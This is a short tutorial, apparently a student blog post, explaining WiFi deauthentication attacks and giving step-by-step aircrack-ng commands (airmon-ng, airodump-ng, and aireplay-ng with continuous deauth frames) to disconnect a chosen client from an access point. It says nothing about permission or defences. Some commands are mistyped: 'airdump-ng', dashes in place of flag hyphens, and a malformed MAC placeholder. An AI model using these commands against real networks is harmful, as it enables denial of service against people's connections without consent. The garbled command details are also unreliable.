De authentication Attack
Attack :
This post will explain what is de authentication attack and how it works.
Deauth attack can be used to disable communication between any connected device with the WiFi Access Point (Router). This attack works on any device i Phones, android device etc… Because It is part of the protocol used in all devices for data communication.
How de authentication attack works?
In this attack, the attacker does not need to be connected. Attacker only needs the MAC address of access point and the client. Here client is connected to WiFi access point.
Then the attacker sends De authentication frame to the access point.
After sending de authentication frames, communication between client and the access point will be blocked.
How to perform a deauth attack?
To perform this attack, we need aircrack-ng. We have used Kali Linux to perform this attack, but it can be used in any operating systems. If you are using VM, then you’ll need a network adapter.
Run “iwconfig” command to list out installed network interfaces. Find the wireless card. Here my wireless card is “wlan0”.
Next, run “airmon-ng start wlan0” which will start your wireless card in monitor mode.
Now run “iwconfig” again, your wireless card’s name will be changed to wlan0mon.
Now run “airdump-ng wlan0mon” command to list out all access points (Routers) in range. We need the MAC address and channel of the router. MAC address can be found in the BSSID column and the channel in the CH column.
After getting channel and MAC address, type this command “airodump-ng wlan0mon — bssid XX:XX:XX:XX:XX — channel 1“
Replace XX:XX:XX:XX:XX with the mac address of router and 1 with its channel.
Then you’ll see the devices connected to the router. Run this command to perform deauth attack to the client. “aireplay-ng -0 0 -c YY:YY:YY:YY:YY:YY -a XX:XX:XX:XX:XX wlan0mon” Replace YY:YY:YY:YY:YY:YY with the client’s MAC address
- -0 0 option will continuously send deauth frames to the router
- — c YY:YY:YY:YY:YY:YY specifies the MAC address of client.
- -a XX:XX:XX:XX:XX specifies the MAC address of access point.
Now your device will be disconnected from the network!
This story written by Amin Yash(17ce003) & Mori Kuldip(d18ce144).